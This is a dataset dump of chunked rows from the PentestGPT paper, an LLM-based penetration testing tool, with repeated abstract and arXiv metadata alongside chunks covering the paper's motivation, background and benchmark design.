doi
stringlengths 10
10
| chunk-id
int64 0
936
| chunk
stringlengths 401
2.02k
| id
stringlengths 12
14
| title
stringlengths 8
162
| summary
stringlengths 228
1.92k
| source
stringlengths 31
31
| authors
stringlengths 7
6.97k
| categories
stringlengths 5
107
| comment
stringlengths 4
398
⌀ | journal_ref
stringlengths 8
194
⌀ | primary_category
stringlengths 5
17
| published
stringlengths 8
8
| updated
stringlengths 8
8
| references
list |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2308.06782 | 9 | 1) EXPLOITFLOW []: A modular library to produce cyber security exploitation routes (exploit flows). EXPLOIT- FLOW aims to combine and compose exploits from different sources and frameworks, capturing the state of the system being tested in a flow after every discrete action which allows learning attack trees that affect a given system. EXPLOITFLOWâs main motivation is to facilitate and empower Game Theory and Artificial Intelligence (AI) research in cyber security. It provides a unique representation of the exploitation process that encodes every facet within it. Its representation can be effectively integrated with various penetration testing tools and scripts, such as Metasploit [15] to perform end-to-end penetration testing. Such representation can be further visualized to guide the human experts for the reproduction of the testing process.
2) PENTESTGPT (this paper): An automated penetration testing system that leverages the power of LLMs to produce testing guidance and intuition at every given discrete state. It functions as the core component of the MALISM framework, guiding the LLMs to efficiently utilize their domain knowledge in real-world testing scenarios.
3) PENTESTPERF: A comprehensive penetration testing benchmark developed to evaluate the performances of penetration testers and automated tools across a wide array of testing targets. It offers a fair and robust platform for performance comparison. | 2308.06782#9 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 10 | The harmonious integration of these three components forms an automated, self-evolving penetration testing frame- work capable of executing penetration tests over various targets, MALISM. This framework to develop fully auto- mated penetration testing tools, which we name cyberse3
curity cognitive engines, aims to revolutionize the field of penetration testing by significantly reducing the need for domain expertise and enabling more comprehensive and reliable testing. | 2308.06782#10 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 11 | Building on our insights into LLMsâ capabilities in penetration testing, we present PENTESTGPT, an interactive system designed to enhance the application of LLMs in this domain. Drawing inspiration from the collaborative dynamics commonly observed in real-world human pen- etration testing teams, PENTESTGPT is particularly tai- lored to manage large and intricate projects. It features a tripartite architecture comprising Reasoning, Generation, and Parsing Modules, each reflecting specific roles within penetration testing teams. The Reasoning Module emulates the function of a lead tester, focusing on maintaining a high-level overview of the penetration testing status. We introduce a novel representation, the Pentesting Task Tree (PTT), based on the cybersecurity attack tree [16]. This structure encodes the testing processâs ongoing status and steers subsequent actions. Uniquely, this representation can be translated into natural language and interpreted by the LLM, thereby comprehended by the Generation Module and directing the testing procedure. The Generation Module, mirroring a junior testerâs role, is responsible for construct- ing detailed procedures for specific sub-tasks. Translating these into | 2308.06782#11 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 12 | Generation Module, mirroring a junior testerâs role, is responsible for construct- ing detailed procedures for specific sub-tasks. Translating these into exact testing operations augments the generation processâs accuracy. Meanwhile, the Parsing Module deals with diverse text data encountered during penetration test- ing, such as tool outputs, source codes, and HTTP web pages. It condenses and emphasizes these texts, extracting essential information. Collectively, these modules function as an integrated system. PENTESTGPT completes a complex penetration testing task by bridging high-level strategies with precise execution and intelligent data interpretation, thereby maintaining a coherent and effective testing process. We evaluate PENTESTGPT using our benchmark to showcase its efficacy. Specifically, our system achieves remarkable performance gains, with 228.6% and 58.6% increases in sub-task completion compared to the direct usage of GPT-3.5 and GPT-4, respectively. We also apply PENTESTGPT to the HackTheBox active penetration testing machines challenge [17], completing 4 out of the 10 selected targets at a total OpenAI API cost of 131.5 US Dollars, ranking among the top | 2308.06782#12 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 13 | testing machines challenge [17], completing 4 out of the 10 selected targets at a total OpenAI API cost of 131.5 US Dollars, ranking among the top 1% players in a community of over 670,000 members. This evaluation underscores PEN- TESTGPTâs practical value in enhancing penetration testing tasksâ efficiency and precision. The solution has been made publicly available on GitHub1, receiving widespread acclaim with over 4,700 stars to the date of writing, active commu- nity engagement, and ongoing collaboration with multiple industrial partners. | 2308.06782#13 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 14 | In summary, we make the following contributions: ⢠Development of a Comprehensive Penetration Testing Benchmark. We craft a robust and representative penetra- tion testing benchmark, encompassing a multitude of test
1. For anonymity during the review process, we have created an anony- mous repository to open-source our solution [18].
machines from leading platforms such as HackTheBox and VulnHub. This benchmark includes 182 sub-tasks covering OWASPâs top 10 vulnerabilities, offering fair and comprehensive evaluation of penetration testing.
⢠Empirical Evaluation of LLMs for Penetration Testing Tasks. By employing models like GPT-3.5, GPT-4, and Bard, our exploratory study rigorously investigates the strengths and limitations of LLMs in penetration testing. The insights gleaned from this analysis shed valuable light on the capabilities and challenges faced by LLMs, enriching our understanding of their applicability in this specialized domain.
⢠Development of an Innovative LLM-powered Penetra- tion Testing System. We engineer PENTESTGPT, a novel interactive system that leverages the strengths of LLMs to carry out penetration testing tasks automatically. Draw- ing inspiration from real-world human penetration testing teams, PENTESTGPT integrates a tripartite design that mirrors the collaborative dynamics between senior and junior testers. This architecture optimizes LLMsâ usage, significantly enhancing the efficiency and effectiveness of automated penetration testing. | 2308.06782#14 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 15 | # 2. Background & Related Work
# 2.1. Penetration Testing
Penetration testing, or âpentestingâ, is a critical practice to enhance organizational systemsâ security. In a typical penetration test, security professionals, known as penetration testers, analyze the target system, often leveraging auto- mated tools. The standard process is divided into seven phases [19]: Reconnaissance, Scanning, Vulnerability As- sessment, Exploitation, and Post Exploitation (including reporting). These phases enable testers to understand the target system, identify vulnerabilities, and exploit them to gain access. | 2308.06782#15 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 16 | Despite substantial efforts [8], [20], [21] in the field, a fully automated penetration testing pipeline remains elusive. The challenges in automating the process arise from the comprehensive knowledge needed to understand and manip- ulate various vulnerabilities and the demand for a strategic plan to guide subsequent actions. In practice, penetration testers often use a combined approach integrating depth- first and breadth-first search techniques [19]. They begin by obtaining an overarching understanding of the target envi- ronment (utilizing a breadth-first approach) before focusing on specific services and vulnerabilities (employing a depth- first approach). This strategy ensures a thorough system analysis while prioritizing promising attack vectors, rely- ing heavily on individual experience and domain expertise. Additionally, penetration testing requires many specialized tools with unique features and functions. This diversity adds complexity to the automation process. Therefore, even with the support of artificial intelligence, creating a fully unified solution for automated penetration testing remains a formidable challenge.
4
# 2.2. Large Language Models | 2308.06782#16 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 17 | 4
# 2.2. Large Language Models
Large Language Models (LLMs), including OpenAIâs GPT-3.5 and GPT-4, are prominent tools with applications extending to various cybersecurity-related fields, such as code analysis [22] and vulnerability repairment [23]. These models are equipped with wide-ranging general knowledge and the capacity for elementary reasoning. They can com- prehend, infer, and produce text resembling human commu- nication, aided by a training corpus encompassing diverse domains like computer science and cybersecurity. Their ability to interpret context and recognize patterns enables them to adapt knowledge to new scenarios. This adaptability, coupled with their proficiency in interacting with systems in a human-like way, positions them as valuable assets in enhancing penetration testing processes. Despite inherent limitations, LLMs offer distinct attributes that can substan- tially aid in the automation and improvement of penetration testing tasks. The realization of this potential, however, requires the creation and application of a specialized and rigorous benchmark.
# 3. Penetration Testing Benchmark
# 3.1. Motivation | 2308.06782#17 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 18 | # 3. Penetration Testing Benchmark
# 3.1. Motivation
The fair evaluation of Large Language Models (LLMs) in penetration testing necessitates a robust and representative benchmark. Existing benchmarks in this domain [7], [8] have several limitations. First, they are often restricted in scope, focusing on a narrow range of potential vulnerabili- ties, and thus fail to capture the complexity and diversity of real-world cyber threats. For instance, the OWASP bench- mark juiceshop [24] is commonly adopted for evaluating web vulnerability testing. However, it does not touch the concept of privilege escalation, which is an essential aspect of penetration testing. Second, existing benchmarks may not recognize the cumulative value of progress through the different stages of penetration testing, as they tend to evaluate only the final exploitation success. This approach overlooks the nuanced value each step contributes to the overall process, resulting in metrics that might not accurately represent actual performance in real-world scenarios. | 2308.06782#18 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 19 | To address these concerns, we propose the construc- tion of a comprehensive penetration testing benchmark that meets the following criteria: Task Variety. The benchmark must encompass diverse tasks, reflecting various operating systems and emulating the diversity of scenarios encountered in real-world penetration testing. Challenge Levels. To ensure broad applicability, the bench- mark must include tasks of varying difficulty levels suitable for challenging novice and expert testers. Progress Tracking. Beyond mere success or failure met- rics, the benchmark must facilitate tracking of incremental progress, thereby recognizing and scoring the value added at each stage of the penetration testing process.
# 3.2. Benchmark Design | 2308.06782#19 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 20 | Following the criteria outlined previously, we develop a comprehensive benchmark that closely reflects real-world penetration testing tasks. The design process progresses through several stages. Task Selection. Our first step is to meticulously select tasks from HackTheBox [9] (HTB) and VulnHub [10]. These platforms are widely recognized and frequently utilized for penetration testing practice. Our selection process is guided by a desire to incorporate a diverse and challenging set of tasks. Capture The Flag (CTF) exercises and real-world testing scenarios have been included. The targets are drawn from various operating systems and encompass a broad spectrum of vulnerabilities. This approach ensures a wide representation of real-world penetration testing tasks. To account for different skill levels, the selected tasks cover a broad range of difficulty. While HTB and VulnHub offer reference difficulty levels, we further validate these with input from three certified penetration testers2, including the authors of this work. This collaborative process yields a consensus on the final difficulty rating for each target, align- ing with the conventional categorization [10] of penetration testing machines into easy, medium, and hard | 2308.06782#20 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
In response to these insights, we introduce PentestGPT, an LLM-empowered
automatic penetration testing tool that leverages the abundant domain knowledge
inherent in LLMs. PentestGPT is meticulously designed with three
self-interacting modules, each addressing individual sub-tasks of penetration
testing, to mitigate the challenges related to context loss. Our evaluation
shows that PentestGPT not only outperforms LLMs with a task-completion increase
of 228.6\% compared to the \gptthree model among the benchmark targets but also
proves effective in tackling real-world penetration testing challenges. Having
been open-sourced on GitHub, PentestGPT has garnered over 4,700 stars and
fostered active community engagement, attesting to its value and impact in both
the academic and industrial spheres. | http://arxiv.org/pdf/2308.06782 | Gelei Deng, Yi Liu, Víctor Mayoral-Vilches, Peng Liu, Yuekang Li, Yuan Xu, Tianwei Zhang, Yang Liu, Martin Pinzger, Stefan Rass | cs.SE, cs.CR | null | null | cs.SE | 20230813 | 20230813 | [
{
"id": "2305.13860"
},
{
"id": "2302.04023"
},
{
"id": "2206.07682"
},
{
"id": "2305.13534"
},
{
"id": "2303.18223"
},
{
"id": "2303.08896"
},
{
"id": "1905.05965"
},
{
"id": "2304.01852"
}
] |
2308.06782 | 21 | consensus on the final difficulty rating for each target, align- ing with the conventional categorization [10] of penetration testing machines into easy, medium, and hard levels. It is worth noting that our benchmark does not explicitly include benign targets for evaluating false positives. This is because the iterative and exploratory nature of penetration testing inherently involves investigating services within the target that may ultimately be deemed benign. In this process, our primary focus is successfully identifying genuine vulnera- bilities. Task Decomposition. We further parse the testing process of each target into a series of sub-tasks, following the stan- dard solution commonly referred to as the âwalkthroughâ in penetration testing. Each sub-task corresponds to a unique step in the overall process. Specifically, a sub-task may represent a micro-step involving the use of a particular penetration testing tool (e.g., performing port scanning with nmap [25]) or exploiting a unique vulnerability identified in the Common Weakness Enumeration (CWE) [26] (e.g., exploiting SQL injection). To standardize decomposition, we arrange the sub-tasks into a two-layer structure. Initially, we | 2308.06782#21 | PentestGPT: An LLM-empowered Automatic Penetration Testing Tool | Penetration testing, a crucial industrial practice for ensuring system
security, has traditionally resisted automation due to the extensive expertise
required by human professionals. Large Language Models (LLMs) have shown
significant advancements in various domains, and their emergent abilities
suggest their potential to revolutionize industries. In this research, we
evaluate the performance of LLMs on real-world penetration testing tasks using
a robust benchmark created from test machines with platforms. Our findings
reveal that while LLMs demonstrate proficiency in specific sub-tasks within the
penetration testing process, such as using testing tools, interpreting outputs,
and proposing subsequent actions, they also encounter difficulties maintaining
an integrated understanding of the overall testing scenario.
